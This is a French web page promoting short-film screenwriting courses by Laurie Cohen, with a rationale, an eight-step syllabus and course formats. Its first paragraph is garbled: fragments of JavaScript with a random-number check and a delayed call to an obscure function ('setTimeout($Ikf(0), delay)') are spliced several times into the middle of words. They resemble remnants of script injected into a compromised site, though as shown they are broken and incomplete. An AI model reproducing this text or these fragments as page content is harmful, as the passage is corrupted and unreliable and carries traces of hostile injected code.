Les cours de court-métrage

de Laurie Cohen

POURQUOI ÉCRIRE UN COURT-MÉTRAGE ?

Pour se faire remarquer par les producteurs, et découvrir l’écriture scénaristique, et potentiellement par la suite, la réalisation. Pour faire un bon film, il faut déjà un scénario de qualité… Le format de quinze minutes est idéal pour recevoir des aides dans les commissions, et se présenter en compétition officielle dans les grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands festivals, comme Cannes, Berlin, ou Clermont-Ferrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

Quelle est la particularité de ce format ? Son format court implique nécessairement une narration forte, et rapidement captivante, avec une fin, souvent, surprenante. On doit rapidement distinguer les enjeux, et trouver un équilibre entre les dialogues et l’action.

Ecriture Auteurs scénaristes

LE PROGRAMME DU COURS

1/Trouver l’idée du film et la développer
2/ Organiser la dramaturgie
3/ Développer la psychologie des personnages
4/ Approfondir son sujet à travers des recherches documentaires
5/ Finaliser la structure narrative, puis écrire
le traitement et le séquencier
6/ Ecrire les dialogues
7/ Corriger et réécrire le scénario
8/ Echange de scénarios et analyse du scénario
d’autrui et conclusion générale.

Cours particuliers, en groupe et en semaine intensive de stage. 

 

Dépôt à l’inventaire de la CNCP en cours : cette formation est en cours de validation pour devenir certifiante et ainsi obtenir une reconnaissance d’état. 

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.